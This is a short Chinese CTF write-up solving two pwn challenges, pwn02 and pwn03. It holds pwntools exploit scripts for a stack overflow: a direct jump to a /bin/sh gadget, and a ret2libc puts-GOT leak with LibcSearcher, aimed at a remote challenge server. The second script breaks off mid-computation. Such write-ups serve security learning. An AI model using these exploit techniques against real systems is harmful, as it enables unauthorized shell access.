一入pwn坑深似海,从此逆向是路人
pwn02
常规checksec一下
扔进IDA
点进pwnme()函数看看,明显的栈溢出
搜索字符串有/bin/sh
直接淦它
from pwn import*
io=remote('111.231.70.44',28054)
#io=process('./pwn02')
bin_sh=0x0804850F
payload=b'a'*13+p32(bin_sh)
io.sendline(payload)
io.interactive()
轻松秒杀
pwn03
依旧常规checksec,只开了NX
和上一题几乎一样,只是没给后门,得ret2libc了
需要远程打通,应该是libc版本不同本地打不通
from pwn import*
from LibcSearcher import*
elf=ELF('./pwn03')
#io=process('./pwn03')
io=remote('111.231.70.44',28021)
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=elf.symbols['main']
payload1=b'a'*13+p32(puts_plt)+p32(main)+p32(puts_got)
io.sendline(payload1)
io.recvuntil('\n\n')
puts_add=u32(io.recv(4))
print(puts_add)
libc=LibcSearcher('puts',puts_add)
libcbase=puts_add-libc